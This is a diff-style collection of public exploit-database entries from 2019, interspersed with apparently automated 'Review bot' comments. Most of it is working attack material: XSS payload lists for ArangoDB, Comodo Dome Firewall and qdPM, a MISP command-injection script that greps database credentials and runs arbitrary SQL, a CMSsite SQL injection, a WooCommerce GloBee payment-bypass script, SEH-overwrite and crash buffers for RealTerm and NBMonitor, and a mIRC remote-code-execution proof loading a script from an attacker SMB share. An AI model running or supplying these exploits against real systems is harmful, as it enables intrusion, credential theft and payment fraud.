@ -0,0 +1,124 @@
##################################################################################################################################
# Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.arangodb.com
# Software Link: https://www.arangodb.com/download-major/
# Version: 3.4.2-1
##################################################################################################################################
Introduction
ArangoDB is a native multi-model, open-source database with flexible data
models for documents, graphs, and key-values. Build high performance
applications using a convenient SQL-like query language or JavaScript
extensions. Use ACID transactions if you require them. Scale horizontally
and vertically with a few mouse clicks.
#################################################################################
XSS details: DOM Based & Reflected & Stored
#################################################################################
XSS1 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#views
PAYLOAD
"><script>alert(1)</script>
<div class="search-field">
<input type="text" value=""><script>alert(1)</script>"
id="viewsSearchInput" class="search-input" placeholder="Search..."/>
<i id="viewsSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS2 | Reflected & Stored - Save as
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
PATCH
PARAMETER
name
PAYLOAD
"><script>alert(2)</script>
#################################################################################
XSS3 | Stored - Delete query
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
Get
#################################################################################
XSS3 | Reflected & Stored - Add User
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
http://127.0.0.1:8529/_db/_system/_api/user
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#user/%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
METHOD
Post
PARAMETER
user,name
PAYLOAD
"><script>alert(3)</script>
"><script>alert(4)</script>
#################################################################################
XSS5 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
PAYLOAD
"><script>alert(5)</script>
<div class="search-field">
<input type="text" value=""><script>alert(5)</script>"
id="userManagementSearchInput" class="search-input"
placeholder="Search..."/>
<!-- <img id="userManagementSearchSubmit" class="search-submit-icon">
-->
<i id="userManagementSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS6 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#databases
PAYLOAD
"><script>alert(6)</script>
<div class="search-field">
<input type="text" value=""><script>alert(6)</script>"
id="databaseSearchInput" class="search-input" placeholder="Search..."/>
<!-- <img id="databaseSearchSubmit" class="search-submit-icon">-->
<i id="databaseSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################


@ -0,0 +1,929 @@
##################################################################################################################################
# Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting
# Date: 18.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://cdome.comodo.com/firewall/
# Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278
# Version: 2.7.0
##################################################################################################################################
Introduction
Comodo Dome Firewall (DFW) provides comprehensive security for enterprise
networks. The firewall software can be installed on a physical system or a
virtual machine.
Dome Firewall simplifies the overall management of network security by
delivering a single interface through which administrators can control
firewall policy, antivirus, intrusion prevention, website filtering,
traffic monitoring, VPN and proxy servers. Dome Firewall also features
highly configurable notifications, in-depth reporting and an informative
dashboard which offers a panoramic view of all major settings and network
events.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.200:10443/korugan/login
METHOD
Post
PARAMETER
username
PAYLOAD
"><script>alert(1)</script>
#################################################################################
XSS2 | Stored
URL
https://192.168.2.200:10443/korugan/admin_profiles
METHOD
Post
PARAMETER
comment
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS3 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
admin_name
PAYLOAD
<script>alert(3)</script>
#################################################################################
XSS4 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(4)</script>
#################################################################################
XSS5 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
surname
PAYLOAD
<script>alert(5)</script>
#################################################################################
XSS6 | Stored
URL
https://192.168.2.200:10443/korugan/license_activation
METHOD
Post
PARAMETER
newLicense
PAYLOAD
<script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
https://192.168.2.200:10443/korugan/cmclient
METHOD
Post
PARAMETER
organization
PAYLOAD
"><script>alert(7)</script>
#################################################################################
XSS8 | Reflected
URL
https://192.168.2.200:10443/korugan/backupschedule
METHOD
Post
PARAMETER
BACKUP_RCPTTO
PAYLOAD
<script>alert(8)</script>
#################################################################################
XSS9 | Reflected
URL
https://192.168.2.200:10443/korugan/netwizard2
METHOD
Post
PARAMETER
netmask_addr
PAYLOAD
<script>alert(9)</script>
#################################################################################
XSS10 | Reflected
URL
https://192.168.2.200:10443/korugan/routing
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(10)</script>
#################################################################################
XSS11 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
source
PAYLOAD
<script>alert(11)</script>
#################################################################################
XSS12 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(12)</script>
#################################################################################
XSS13 | Reflected
URL
https://192.168.2.200:10443/korugan/dhcp
METHOD
Post
PARAMETER
GATEWAY_GREEN
PAYLOAD
<script>alert(13)</script>
#################################################################################
XSS14 | Reflected
URL
https://192.168.2.200:10443/korugan/time
METHOD
Post
PARAMETER
NTP_SERVER_LIST
PAYLOAD
<script>alert(14)</script>
#################################################################################
XSS15 | Reflected
URL
https://192.168.2.200:10443/manage/ips/rules/?ACTION=policy&CONTROLLERNAME=&ID=%3Cscript%3Ealert(15)%3C/script%3E&policy=drop
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(15)</script>
#################################################################################
XSS16 | Reflected
URL
https://192.168.2.200:10443/manage/ips/appid/?ACTION=enable&CONTROLLERNAME=&ID=%3Cscript%3Ealert(16)%3C/script%3E&enabled=off
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(16)</script>
#################################################################################
XSS17 | Reflected
URL
https://192.168.2.200:10443/korugan/hotspot_permanent_users
METHOD
Post
PARAMETER
MACADDRESSES
PAYLOAD
<script>alert(17)</script>
#################################################################################
XSS18 | Reflected
URL
https://192.168.2.200:10443/manage/qos/devices/
METHOD
Post
PARAMETER
device
PAYLOAD
<script>alert(18)</script>
#################################################################################
XSS19 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
protocol
PAYLOAD
<script>alert(19)</script>
#################################################################################
XSS20 | Reflected
URL
https://192.168.2.200:10443/korugan/fwgroups
METHOD
Post
PARAMETER
FWADDRESSES
PAYLOAD
<script>alert(20)</script>
#################################################################################
XSS21 | Stored
URL
https://192.168.2.200:10443/korugan/schedule
METHOD
Post
PARAMETER
SCHNAME
PAYLOAD
<script>alert(21)</script>
#################################################################################
XSS22 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
port
PAYLOAD
<script>alert(22)</script>
#################################################################################
XSS23 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
snat_to_ip
PAYLOAD
<script>alert(23)</script>
#################################################################################
XSS24 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
mac
PAYLOAD
<script>alert(24)</script>
#################################################################################
XSS25 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(25)</script>
#################################################################################
XSS26 | Stored
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(26)</script>
#################################################################################
XSS27 | Reflected
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(27)</script>
#################################################################################
XSS28 | Stored
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(28)</script>
#################################################################################
XSS29 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
PROXY_PORT
PAYLOAD
<script>alert(29)</script>
#################################################################################
XSS30 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
VISIBLE_HOSTNAME
PAYLOAD
<script>alert(30)</script>
#################################################################################
XSS31 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
ADMIN_MAIL_ADDRESS
PAYLOAD
<script>alert(31)</script>
#################################################################################
XSS32 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
CACHE_MEM
PAYLOAD
<script>alert(32)</script>
#################################################################################
XSS33 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
<script>alert(33)</script>
#################################################################################
XSS34 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MIN_SIZE
PAYLOAD
<script>alert(34)</script>
#################################################################################
XSS35 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
DST_NOCACHE
PAYLOAD
<script>alert(35)</script>
#################################################################################
XSS36 | Reflected
URL
https://192.168.2.200:10443/korugan/https_exceptions
METHOD
Post
PARAMETER
EXCEPTIONSITELIST
PAYLOAD
<script>alert(36)</script>
#################################################################################
XSS37 | Reflected
URL
https://192.168.2.200:10443/korugan/smtpconfig
METHOD
Post
PARAMETER
VIRUS_ADMIN
PAYLOAD
<script>alert(37)</script>
#################################################################################
XSS38 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_SOURCE_BYPASS
PAYLOAD
<script>alert(38)</script>
#################################################################################
XSS39 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_DESTINATION_BYPASS
PAYLOAD
<script>alert(39)</script>
#################################################################################
XSS40 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_WHITELIST
PAYLOAD
<script>alert(40)</script>
#################################################################################
XSS41 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_BLACKLIST
PAYLOAD
<script>alert(41)</script>
#################################################################################
XSS42 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(42)</script>
#################################################################################
XSS43 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
remotenets
PAYLOAD
<script>alert(43)</script>
#################################################################################
XSS44 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
explicitroutes
PAYLOAD
<script>alert(44)</script>
#################################################################################
XSS45 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
static_ip
PAYLOAD
<script>alert(45)</script>
#################################################################################
XSS46 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_dns
PAYLOAD
<script>alert(46)</script>
#################################################################################
XSS47 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_domain
PAYLOAD
<script>alert(47)</script>
#################################################################################
XSS48 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_NETWORKS
PAYLOAD
<script>alert(48)</script>
#################################################################################
XSS49 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_DNS
PAYLOAD
<script>alert(49)</script>
#################################################################################
XSS50 | Reflected
URL
https://192.168.2.200:10443/korugan/vpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(50)</script>
#################################################################################
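Review bot: The header block at the top of this section does not say whether the fifty listed endpoints require an authenticated administrator session, nor whether the vendor was notified or a fixed build exists, which is what a defender needs to triage the findings. Two header lines would close that gap, e.g. `# Authentication required: [yes/no — to be confirmed by author]` and `# Fixed in: [version, or 'unpatched at time of writing']`. The hunk header announces 929 lines but only the entries up to XSS50 are visible here, so the rest of the section is outside this view.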


@ -0,0 +1,34 @@
===========================================================================================
# Exploit Title: qdPM 9.1 - 'type' XSS Injection
# CVE: CVE-2019-8391.
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
Free project management tool for small team
qdPM is a free web-based project management tool suitable for a small
team working on multiple projects.
It is fully configurable. You can easy manage Projects, Tasks and People.
Customers interact
using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : type
# Attack Pattern : tasks_columns_list<script>bKtx(9366)</script>
# GET Request: http://localhost/qdpm/index.php/configuration
===========================================================================================
GET
/qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script>
HTTP/1.1
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


@ -0,0 +1,36 @@
===========================================================================================
# Exploit Title: qdPM 9.1 - 'search[keywords]' XSS Injection
# CVE: CVE-2019-8390
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
Free project management tool for small team
qdPM is a free web-based project management tool suitable for a small
team working on multiple projects.
It is fully configurable. You can easy manage Projects, Tasks and People.
Customers interact
using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : search[keywords]
# Attack Pattern : e"><script>zi2u(9111)</script>
# POST Request : http://localhost/qdpm/index.php/configuration
===========================================================================================
POST /qdpm/index.php/users HTTP/1.1
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
search[keywords]=e"><script>zi2u(9111)</script>&search_by_extrafields[]=9
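Review bot: The preamble line `# POST Request : http://localhost/qdpm/index.php/configuration` disagrees with the raw request that follows it, which is sent to `/qdpm/index.php/users`; a defender mapping the finding to a route would pick the wrong one. The preamble appears to be copied from the sibling 'type' advisory, which does target the configuration route, so presumably the request line is the accurate one and the preamble should read `# POST Request : http://localhost/qdpm/index.php/users`. The author should confirm which route reflects `search[keywords]` before the entry is relied on.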

57
exploits/php/webapps/46401.py Executable file

@ -0,0 +1,57 @@
#-*-coding:utf-8-*-
#
# Exploit Title: SQL command execution via command injection in STIX module
# Date: 2019-17-02
# Exploit Author: Tm9jdGlz
# Vendor Homepage: https://www.misp-project.org/
# Software link: https://www.misp-project.org/download/
# Version: 2.4.90 - 2.4.99
# Tested on: 2.4.97
# CVE: CVE-2018-19908
#
# Use this payload as stix filename
def encode_data(data):
from base64 import b64encode
from urllib.parse import quote_plus
b64Data = b64encode(data.encode("utf-8"))
urlEncode = quote_plus(b64Data)
return urlEncode
def generate_payload(SQLRequest):
payload = 'MISPPath="../../";'\
'MISPPDB="$MISPPath/app/Config/database.php";'\
'MySQLUUser=$(grep -o -P "(?<=\'login\' => \').*(?=\')" $MISPPDB);'\
'MySQLRUser=${{MySQLRUser:-$MySQLUUser}};'\
'MySQLUPass=$(grep -o -P "(?<=\'password\' => \').*(?=\')" $MISPPDB);'\
'MySQLRPass=${{MySQLRPass:-$MySQLUPass}};'\
'MISPDB=$(grep -o -P "(?<=\'database\' => \').*(?=\')" $MISPPDB);'\
'mysql -u $MySQLRUser -p$MySQLRPass $MISPDB -e "{}"'
return payload.format(SQLRequest)
def generate_exploit(SQLRequest, **kwargs):
options = {
"inputFile" : kwargs.get("input_file", "data"),
"outputFile" : kwargs.get("output_file", "data2"),
"payload" : encode_data(generate_payload(SQLRequest))
}
exploit = "; echo '{payload}'>{inputFile};"\
"python3 -c 'import urllib.parse;"\
'fd=open(\\"{outputFile}\\",\\"w\\");'\
'fd.write(urllib.parse.unquote_plus(open(\\"{inputFile}\\").read()));'\
"fd.close()';"\
"base64 -d {outputFile}>{inputFile};"\
"sh {inputFile};"\
"rm {inputFile} {outputFile} #".format(**options)
return exploit
def main():
SQLRequest = "UPDATE users SET role_id=1 WHERE id = 2"
print(generate_exploit(SQLRequest))
if __name__ == "__main__":
main()
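Review bot: The header line `# Date: 2019-17-02` is not a valid date (month 17); given that files.csv records this entry as 2019-02-18, it is presumably meant to be `# Date: 2019-02-17`. Separately, none of the three functions carries a docstring, so the only statement of where the value is used is the loose comment `# Use this payload as stix filename`; a one-line docstring on `generate_exploit` restating that, and a note on `generate_payload` that it reads the database credentials from `app/Config/database.php` on the target (which is what the grep calls do), would make the script self-describing for anyone assessing exposure to CVE-2018-19908. The page has flattened the file's indentation, so the function bodies cannot be checked line by line here.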


@ -0,0 +1,24 @@
# Exploit Title: CMSsite 1.0 - 'post' SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 17, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
# Vulnerable File: post.php
# Vulnerable Parameter : post
if (isset($_GET['post'])) {
$post = $_GET['post'];
}
$query = "SELECT * FROM posts WHERE post_id=$post";
$run_query = mysqli_query($con, $query);
# Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10))
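Review bot: The advisory quotes the vulnerable code but names no fix, and the quoted snippet shows two defects worth stating for anyone patching it: `$post` is only assigned when the parameter is present yet is interpolated into the query unconditionally, and the value goes into the SQL string unescaped. The remediation is a prepared statement, e.g. `$stmt = mysqli_prepare($con, "SELECT * FROM posts WHERE post_id = ?"); mysqli_stmt_bind_param($stmt, "i", $post);` together with a 400 response when the parameter is missing or not an integer. Adding a `# Fix:` line with that would make the entry useful to defenders as well as testers.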


@ -0,0 +1,26 @@
===========================================================================================
# Exploit Title: Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/
# Software Link: https://sourceforge.net/projects/webinessinventory/files/
# Version: 2.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: CVE-2019-8404
# Software Description: Small stock inventory managment application for web.
===========================================================================================
# POC:
# Sign in to admin panel. then go to the inventory tab.
Switch to the products tab and create a new product.
In product image, click the browse button and select a file.
https://i.hizliresim.com/OvrOOn.jpg
When you save the product, the script is loaded with the error file to
the server.
for example service unvailable
https://i.hizliresim.com/zjGqD4.jpg
path to the file we uploaded
https://i.hizliresim.com/XMbpp5.jpg
# http://localhost/[PATH]/runtime/ProductModel/[FILE]
===========================================================================================
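Review bot: The reproduction steps depend on three screenshots hosted on an external image service (hizliresim.com), so the substance of the finding — which file types the product-image field accepts and what the server returned — is not stated in text and will be lost once those links expire. A sentence naming the extension that reached `runtime/ProductModel/` and the exact error shown ("service unvailable" is quoted but not explained) would make the entry self-contained. It would also help to say whether `[FILE]` in the final URL keeps the original upload name or is renamed, since that is what an operator would search for in web-server logs.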


@ -0,0 +1,93 @@
<?php
# Exploit Title: WordPress WooCommerce - GloBee (cryptocurrency) Payment Gateway Plugin [Payment Bypass / Unauthorized Order Status Spoofing]
# Discovery Date: 14.12.2018
# Public Disclosure Date: 14.02.2019
# Exploit Author: GeekHack
# Contact: https://t.me/GeekHack
# Vendor Homepage: https://globee.com/ (previously payb.ee)
# Software Link: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/releases/tag/v1.1.1
# Version: <= 1.1.1
# Tested on: WordPress 4.9.9 + WooCommerce 3.5.1 + GloBee Payment Gateway Plugin 1.1.1
# CVE: CVE-2018-20782
/*
Description:
Reliance on untrusted inputs (CWE-807), insufficient data verification and lack of any cryptographic authentication (hmac etc) at IPN callback (ipn_callback() function in Gateway.php at 374 line) allow remote (even unauthorized) attacker to bypass payment process and spoof real order status without actually paying for it.
[code ref: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/blob/8c254d6100ef4cfb3432b219726f4936c1531234/src/Gateway.php#L374]
Such actions like 'changin order status' normally require administrative rights. But in this case anyone can perform these actions, even with the most limited rights, therefor this issue "can" also be considered as a Privilege Escalation (CWE-269) vulnerability (but it's not quite right, imho).
*/
if(php_sapi_name() !== 'cli')
die('Use CLI: php '.__FILE__);
if(!extension_loaded('curl'))
die('cURL extension is required');
echo 'Payment Bypass (CVE-2018-20782) PoC by GeekHack team.'."\n";
echo 'Select any product(s) in a vulnerable store and continue checkout through payment via cryptocurrencies (GloBee Payment Gateway).'."\n\n";
$shopURL = rtrim(readline('Shop root URL (https://shop.example.com/): '), '/');
if(strpos(@get_headers($shopURL)[0], '200') === false)
die('Shop url is invalid or not exists (or request was blocked), check link format and try again.');
$paymentLink = readline('Payment link (https://globee.com/en/payment-request/XXXXXXXXXXXXXXXXXXXXXX): ');
if(preg_match('/https:\/\/globee\.com\/en\/payment-request\/(\w*)/', $paymentLink, $matches)) {
$paymentID = $matches[1];
}else{
die('Payment link is invalid, check link format and try again.');
}
$orderID = (int)readline('Order ID: ');
if(!$orderID)
die('Order ID is invalid, must be a positive integer, try again.');
$payload = [ // commented fields are not required for exploitation
'id' => $paymentID,
'status' => 'completed',
//'total' => '123.45',
//'currency' => "USD",
'custom_payment_id' => $orderID,
//'callback_data' => "example data",
/*'customer' => [
'name' => 'John Smit',
'email' => 'john.smit@hotmail.com'
],*/
/*'payment_details' => [
'currency' => 'BTC'
],*/
//'redirect_url' => 'http://globee.com/invoice/'.$paymentID,
//'success_url' => $shopURL,
//'cancel_url' => $shopURL,
//'ipn_url' => $shopURL.'/wc-api/globee_ipn_callback',
//'notification_email' => null,
//'confirmation_speed' => 'medium',
//'expires_at' => '2018-01-25 12:31:04',
//'created_at' => '2018-01-25 12:16:04'
];
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => $shopURL.'/wc-api/globee_ipn_callback',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => "",
CURLOPT_MAXREDIRS => 2,
CURLOPT_TIMEOUT => 10,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => 'POST',
CURLOPT_POSTFIELDS => json_encode($payload),
CURLOPT_HTTPHEADER => array(
'cache-control: no-cache',
'content-type: application/json',
),
));
$response = curl_exec($curl);
$err = curl_error($curl);
curl_close($curl);
if ($err) {
echo 'cURL Error #: '.$err;
} else {
echo 'Done: '.$response;
}
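Review bot: The `Description:` block names the root cause — the IPN handler trusts the POSTed `status` with no HMAC or server-side verification — but the advisory never states the corresponding fix, which is what a store operator reading it needs. A line after the code reference such as `Mitigation: the IPN handler should treat the callback only as a trigger and re-fetch the payment by id from the GloBee API (or verify an HMAC over the body) before changing order status; until patched, reconcile orders marked completed against the GloBee dashboard.` would close that gap. The line containing `'changin order status'` also has a typo ("changing") that the commit could have corrected.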

22
exploits/windows/dos/46390.py Executable file

@ -0,0 +1,22 @@
# -*- coding: utf-8 -*-
# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Port' Denial of Service (PoC)
# Date: 15/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/
# Version: 2.0.0.70
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "RealTerm.py", it will create a new file "PoC.txt"
# 2.- Copy the content of the new file 'PoC.txt' to clipboard
# 3.- Open realterm.exe
# 4.- Go to 'Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> open
# 7.- Crashed
buffer = "\x41" * 1000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()
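Review bot: `f = open ("PoC.txt", "w")` followed by an explicit `f.close()` leaves the file open if `write` raises; the idiomatic form is `with open("PoC.txt", "w") as f: f.write(buffer)`. The same pattern is repeated in 46391.py and 46403.py below. Step 1 of the instructions also refers to the script as "RealTerm.py" while the file is committed as 46390.py (and similarly "EchoPort.py" and "NBMonitor.py" in the other two), which is harmless but will confuse anyone following the steps literally.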

40
exploits/windows/dos/46391.py Executable file

@ -0,0 +1,40 @@
# -*- coding: utf-8 -*-
# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Overflow Crash (SEH) (PoC)
# Date: 16/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/
# Version: 2.0.0.70
# Tested on: Windows 10 / Windows XP
# Proof of Concept:
# 1.- Run the python script "EchoPort.py", it will create a new file "EchoPort.txt"
# 2.- Copy the content of the new file 'EchoPort.txt' to clipboard
# 3.- Open realterm.exe
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On' or
# 8.- Crashed
# After the execution of POC, the SEH chain looks like this:
# 0012F57C 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the Stack
#0012F568 41414141 AAAA
#0012F56C 41414141 AAAA
#0012F570 41414141 AAAA
#0012F574 41414141 AAAA
#0012F578 42424242 BBBB Pointer to next SEH record
#0012F57C 43434343 CCCC SE handler
buffer = "\x41" * 268
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("EchoPort.txt", "w")
f.write(buffer+nseh+seh)
f.close()

23
exploits/windows/dos/46403.py Executable file

@ -0,0 +1,23 @@
# -*- coding: utf-8 -*-
# Exploit Title: NBMonitor 1.6.5 - 'Key' Denial of Service (PoC)
# Date: 15/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Version: 1.6.5.0
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "NBMonitor.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open NBMonitor.exe
# 4.- Go to Register > Enter Registration Code...
# 5.- Write anything in 'Name' field
# 6.- Paste clipboard in 'Key' field
# 7.- Click on button -> Ok
# 8.- Crashed
buffer = "\x41" * 256
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()


@ -0,0 +1,100 @@
# Exploit Title: RCE on mIRC <7.55 using argument injection through custom URI protocol handlers
# Date: 18/02/2019
# Exploit Author: https://twitter.com/proofofcalc/
# Vendor Homepage: https://www.mirc.com
# Software Link: https://www.mirc.com/get.php
# Version: < 7.55
# Tested on: Windows
# CVE : CVE-2019-6453
RCE through URI protocol handlers on mIRC <7.55 (CVE-2019-6453)
===============================================================
Severity: High
mIRC has been shown to be vulnerable to argument injection through its
associated URI protocol handlers that improperly escape their parameters.
Usingavailable command-line parameters, an attacker is able to load a remote
configuration file and to automatically run arbitrary code.
Because mIRC doesn't use any kind of sigil such as -- to mark
the end of the argument list, an attacker is able to pass arguments to mIRC
through a irc:// link and execute arbitrary code by loading a custom
mirc.ini
from an attacker-controlled Samba file server. Please note that ircs://
works
the same way.
PoC
===
The proof of calc requires three files: mirc.ini, calc.ini and poc.html.
We assume a Samba file server is running on the attacker's side. For the
sake of the example, the following pieces of code assume it is running on
host 127.0.0.1 (i.e. replace 127.0.0.1 by your own server's address in
the following files to try this out).
mirc.ini
========
mirc.ini is a custom configuration file that should be located at
C:\mirc-poc\mirc.ini
on the file server.
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini
calc.ini
========
calc.ini is a remote script file that should be located at
C:\mirc-poc\calc.ini on the
file server.
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}
poc.html
========
Just visiting poc.html should work assuming mIRC is set as the default
handler for the
irc:// URI scheme and the browser does not encode the payload. Depending
on the browser
and your configuration, you might still get a prompt (not the case on
Firefox).
<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini' />
Affected versions
=================
This PoC runs for mIRC <7.55.
You can trigger the PoC on Edge 42.17134 (last preview version) and
Firefox 64.0.2
(last release). It doesn't work on Chrome because the way Chrome handle
URI protocols
(URI is encoded before being passed to the application).
References
==========
Further explanation (including proof of concept code):
Write-up:
https://proofofcalc.com/cve-2019-6453-mIRC/
PoC:
https://github.com/proofofcalc/cve-2019-6453-poc
mIRC changelog:
https://www.mirc.com/whatsnew.txt
Authors
=======
Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)
